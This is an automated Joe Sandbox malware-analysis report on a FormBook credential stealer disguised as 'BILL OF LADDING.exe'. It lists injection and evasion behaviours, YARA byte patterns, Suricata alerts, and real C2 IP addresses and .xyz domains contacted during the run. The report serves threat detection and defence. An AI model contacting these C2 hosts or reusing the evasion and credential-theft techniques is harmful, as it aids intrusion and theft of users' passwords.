Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BILL OF LADDING.exe

Overview

General Information

Sample name:BILL OF LADDING.exe
Analysis ID:1529813
MD5:570d898d83e3499d7dce63b784b4d77e
SHA1:f30fcdb3526fae21b709712f02e927e37226dd79
SHA256:d9ffe4a3e77a61cc793c292cb9013ab0362bd1c57fe3e652f24cf93a075e6297
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w7x64
  • BILL OF LADDING.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\BILL OF LADDING.exe" MD5: 570D898D83E3499D7DCE63B784B4D77E)
    • svchost.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\BILL OF LADDING.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • dYBbPgrkLOIMQ.exe (PID: 2412 cmdline: "C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 3332 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
          • dYBbPgrkLOIMQ.exe (PID: 1928 cmdline: "C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3520 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ebf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16e92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\BILL OF LADDING.exe", CommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", ParentImage: C:\Users\user\Desktop\BILL OF LADDING.exe, ParentProcessId: 3216, ParentProcessName: BILL OF LADDING.exe, ProcessCommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", ProcessId: 3268, ProcessName: svchost.exe
        Sigma detected: Modification of IE Registry Settings
        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\schtasks.exe, ProcessId: 3332, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\BILL OF LADDING.exe", CommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", ParentImage: C:\Users\user\Desktop\BILL OF LADDING.exe, ParentProcessId: 3216, ParentProcessName: BILL OF LADDING.exe, ProcessCommandLine: "C:\Users\user\Desktop\BILL OF LADDING.exe", ProcessId: 3268, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-09T12:51:22.543345+020028554651A Network Trojan was detected192.168.2.2249163188.114.97.380TCP
        2024-10-09T12:51:45.868834+020028554651A Network Trojan was detected192.168.2.224916852.13.151.17980TCP
        2024-10-09T12:51:59.210394+020028554651A Network Trojan was detected192.168.2.224917284.32.84.3280TCP
        2024-10-09T12:52:12.936213+020028554651A Network Trojan was detected192.168.2.2249176103.106.67.11280TCP
        2024-10-09T12:53:05.030212+020028554651A Network Trojan was detected192.168.2.2249180188.114.97.380TCP
        2024-10-09T12:53:18.168317+020028554651A Network Trojan was detected192.168.2.22491843.33.130.19080TCP
        2024-10-09T12:53:31.428915+020028554651A Network Trojan was detected192.168.2.2249188217.70.184.5080TCP
        2024-10-09T12:53:45.024325+020028554651A Network Trojan was detected192.168.2.224919254.38.220.8580TCP
        2024-10-09T12:53:58.533913+020028554651A Network Trojan was detected192.168.2.2249196103.224.182.24280TCP
        2024-10-09T12:54:11.868126+020028554651A Network Trojan was detected192.168.2.2249200209.74.64.18780TCP
        2024-10-09T12:54:25.290589+020028554651A Network Trojan was detected192.168.2.224920465.21.196.9080TCP
        2024-10-09T12:54:38.869836+020028554651A Network Trojan was detected192.168.2.224920815.197.148.3380TCP
        2024-10-09T12:54:52.153263+020028554651A Network Trojan was detected192.168.2.22492123.33.130.19080TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-09T12:51:37.633091+020028554641A Network Trojan was detected192.168.2.224916552.13.151.17980TCP
        2024-10-09T12:51:40.764813+020028554641A Network Trojan was detected192.168.2.224916652.13.151.17980TCP
        2024-10-09T12:51:42.735042+020028554641A Network Trojan was detected192.168.2.224916752.13.151.17980TCP
        2024-10-09T12:51:50.940532+020028554641A Network Trojan was detected192.168.2.224916984.32.84.3280TCP
        2024-10-09T12:51:53.963058+020028554641A Network Trojan was detected192.168.2.224917084.32.84.3280TCP
        2024-10-09T12:51:56.214866+020028554641A Network Trojan was detected192.168.2.224917184.32.84.3280TCP
        2024-10-09T12:52:04.635890+020028554641A Network Trojan was detected192.168.2.2249173103.106.67.11280TCP
        2024-10-09T12:52:07.816945+020028554641A Network Trojan was detected192.168.2.2249174103.106.67.11280TCP
        2024-10-09T12:52:09.727712+020028554641A Network Trojan was detected192.168.2.2249175103.106.67.11280TCP
        2024-10-09T12:52:17.989641+020028554641A Network Trojan was detected192.168.2.2249177188.114.97.380TCP
        2024-10-09T12:52:22.056747+020028554641A Network Trojan was detected192.168.2.2249178188.114.97.380TCP
        2024-10-09T12:52:23.080526+020028554641A Network Trojan was detected192.168.2.2249179188.114.97.380TCP
        2024-10-09T12:53:10.077300+020028554641A Network Trojan was detected192.168.2.22491813.33.130.19080TCP
        2024-10-09T12:53:13.067929+020028554641A Network Trojan was detected192.168.2.22491823.33.130.19080TCP
        2024-10-09T12:53:15.155215+020028554641A Network Trojan was detected192.168.2.22491833.33.130.19080TCP
        2024-10-09T12:53:23.197070+020028554641A Network Trojan was detected192.168.2.2249185217.70.184.5080TCP
        2024-10-09T12:53:26.318584+020028554641A Network Trojan was detected192.168.2.2249186217.70.184.5080TCP
        2024-10-09T12:53:28.273570+020028554641A Network Trojan was detected192.168.2.2249187217.70.184.5080TCP
        2024-10-09T12:53:36.502497+020028554641A Network Trojan was detected192.168.2.224918954.38.220.8580TCP
        2024-10-09T12:53:39.969207+020028554641A Network Trojan was detected192.168.2.224919054.38.220.8580TCP
        2024-10-09T12:53:41.769641+020028554641A Network Trojan was detected192.168.2.224919154.38.220.8580TCP
        2024-10-09T12:53:50.244862+020028554641A Network Trojan was detected192.168.2.2249193103.224.182.24280TCP
        2024-10-09T12:53:53.369682+020028554641A Network Trojan was detected192.168.2.2249194103.224.182.24280TCP
        2024-10-09T12:53:55.329927+020028554641A Network Trojan was detected192.168.2.2249195103.224.182.24280TCP
        2024-10-09T12:54:03.613315+020028554641A Network Trojan was detected192.168.2.2249197209.74.64.18780TCP
        2024-10-09T12:54:06.864648+020028554641A Network Trojan was detected192.168.2.2249198209.74.64.18780TCP
        2024-10-09T12:54:08.722747+020028554641A Network Trojan was detected192.168.2.2249199209.74.64.18780TCP
        2024-10-09T12:54:16.997250+020028554641A Network Trojan was detected192.168.2.224920165.21.196.9080TCP
        2024-10-09T12:54:20.206307+020028554641A Network Trojan was detected192.168.2.224920265.21.196.9080TCP
        2024-10-09T12:54:22.091368+020028554641A Network Trojan was detected192.168.2.224920365.21.196.9080TCP
        2024-10-09T12:54:30.340626+020028554641A Network Trojan was detected192.168.2.224920515.197.148.3380TCP
        2024-10-09T12:54:33.333791+020028554641A Network Trojan was detected192.168.2.224920615.197.148.3380TCP
        2024-10-09T12:54:35.591212+020028554641A Network Trojan was detected192.168.2.224920715.197.148.3380TCP
        2024-10-09T12:54:43.948228+020028554641A Network Trojan was detected192.168.2.22492093.33.130.19080TCP
        2024-10-09T12:54:46.957321+020028554641A Network Trojan was detected192.168.2.22492103.33.130.19080TCP
        2024-10-09T12:54:49.036275+020028554641A Network Trojan was detected192.168.2.22492113.33.130.19080TCP
        2024-10-09T12:54:57.920932+020028554641A Network Trojan was detected192.168.2.22492138.210.49.13980TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: BILL OF LADDING.exeReversingLabs: Detection: 34%
        Source: BILL OF LADDING.exeVirustotal: Detection: 43%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.884925142.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400747547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.457282597.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884947109.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.885097332.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.885170853.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.884979231.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400737609.0000000000220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.400881396.0000000002B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: BILL OF LADDING.exeJoe Sandbox ML: detected
        Source: BILL OF LADDING.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dYBbPgrkLOIMQ.exe, 00000003.00000000.381930155.0000000000CFE000.00000002.00000001.01000000.00000004.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000002.885232628.0000000000CFE000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: wntdll.pdb source: BILL OF LADDING.exe, 00000000.00000003.362588890.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, BILL OF LADDING.exe, 00000000.00000003.362826334.0000000003220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379892098.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400782126.0000000000BD0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.379476122.0000000000220000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400782126.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.401126417.0000000000820000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885160766.0000000002080000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885160766.0000000002200000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.401555831.0000000000980000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: sctasks.pdbbz source: svchost.exe, 00000002.00000002.400759281.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400759281.0000000000801000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000002.885011890.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000003.387643597.00000000007AA000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.885002432.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.885346022.000000000292C000.00000004.10000000.00040000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000005.00000000.413893465.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.457375821.00000000015CC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: sctasks.pdb source: svchost.exe, 00000002.00000002.400759281.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.400759281.0000000000801000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000002.885011890.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, dYBbPgrkLOIMQ.exe, 00000003.00000003.387643597.00000000007AA000.00000004.00000001.00020000.00000000.sdmp

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49170 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49182 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 54.38.220.85:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49176 -> 103.106.67.112:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 65.21.196.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 54.38.220.85:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49200 -> 209.74.64.187:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 15.197.148.33:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 103.224.182.242:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49186 -> 217.70.184.50:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49166 -> 52.13.151.179:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 103.106.67.112:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49180 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 217.70.184.50:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49163 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 209.74.64.187:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49198 -> 209.74.64.187:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49204 -> 65.21.196.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49168 -> 52.13.151.179:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49202 -> 65.21.196.90:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49194 -> 103.224.182.242:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 54.38.220.85:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49165 -> 52.13.151.179:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49212 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 15.197.148.33:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 103.106.67.112:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 103.224.182.242:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 65.21.196.90:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49188 -> 217.70.184.50:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 217.70.184.50:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 8.210.49.139:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 188.114.97.3:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49196 -> 103.224.182.242:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49208 -> 15.197.148.33:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49192 -> 54.38.220.85:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49210 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 52.13.151.179:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49206 -> 15.197.148.33:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49172 -> 84.32.84.32:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49184 -> 3.33.130.190:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 103.106.67.112:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 209.74.64.187:80
        Performs DNS queries to domains with low reputation
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeDNS query: www.sailforever.xyz
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeDNS query: www.launchdreamidea.xyz
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeDNS query: www.030002837.xyz
        Source: C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exeDNS query: www.booosted.xyz
        Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
        Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
        Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
        Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
        Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: keep-aliveDate: Wed, 09 Oct 2024 10:51:27 GMTLast-Modified: Fri, 08 Feb 2019 13:45:40 GMTCache-Control: max-age=120ETag: "m5c5d8804s75419"Content-type: application/zip; charset=utf-8Content-length: 480281Data Raw: 50 4b 03 04 14 00 00 00 08 00 0c 03 48 4e 8e f8 a0 df 28 05 00 00 a1 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 c7 69 5c 5c c7 69 5c 5c 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 72 dc 36 0c 80 ef 79 9b c4 1d 4f 5f 20 e7 66 d2 1e 7a d3 50 12 a4 e5 98 22 15 fe 78 bd 7e fa 82 3f bb 04 48 6e 7a b2 f1 41 24 41 08 80 80 fd fe ef 8f bf 7e fe f3 f7 17 f7 4b 49 0f 2f 93 d8 77 0b bb f0 30 2d 46 7b f8 f0 43 4d d0 84 07 6f 26 7c 10 b4 93 46 3f f0 2c 96 b7 70 4e 9b d4 d2 5d 5a 8a d0 b7 ec 14 3b f0 9d 8b c2 c2 21 70 81 de 5b 85 f3 70 56 26 f5 3a cd ca cc 3d 79 fd 83 b3 d5 84 59 01 67 92 9e 5b 40 bb 4e 07 a5 38 39 85 15 07 78 b0 8d 4f 1a 25 4a f0 f1 4c a9 f1 6f a3 33 78 38 58 0e d9 bb 78 90 af af 3d 6b cd 7e 17 2a 34 27 7c 82 35 bd af ee 94 6e 80 e2 34 df 3c 38 8e 16 65 1c 70 64 4e d0 9c 58 10 6b 4b fa a7 ae 16 ff af 28 b8 db 74 11 7a 55 d4 01 11 7a 79 80 09 d5 07 8b d0 0b a8 67 e1 b7 e0 1e 3b b1 7a 51 20 6c ba 26 06 12 c5 f4 1e 49 9a de bf 55 60 94 12 1e f7 9d 34 c0 0a eb 53 05 79 0f a8 0a 87 e6 a1 78 67 cc 91 14 f6 eb 79 40 15 b8 0a 2f 66 81 36 b2 a0 19 29 fb 0d 57 58 94 bf 9d fd b2 c2 07 2b 78 9e 14 2a 7b b3 78 ae 14 38 32 71 6c 99 b1 72 97 e3 05 44 d5 af c3 eb aa b1 2b aa 66 b0 8a 26 12 61 83 27 07 de e2 c9 b4 98 e3 90 7e ba 18 f3 46 d9 29 15 06 7a 0a 8f 1d fc 13 4d 70 2c 9e 8e 53 81 87 0e 30 ab f4 26 77 2a 46 b3 a7 75 2e f9 52 35 98 78 a9 4c 97 18 7d aa a0 9b 37 2a 96 05 59 b7 05 bd 8c b6 bb f3 7e b7 bb 66 b0 d9 61 d6 d0 9b 9c e9 e0 f1 2b 26 ae b9 f6 26 c4 98 6f 52 05 fd b1 88 e5 02 9b 0a e4 c3 13 29 f7 1f 92 0d df 06 0b 9f de 97 48 8e e0 49 f5 5e 73 5d 33 5a dd 38 c3 02 83 b9 77 c0 61 2c d3 38 2f 7c a8 59 1f d3 4d 58 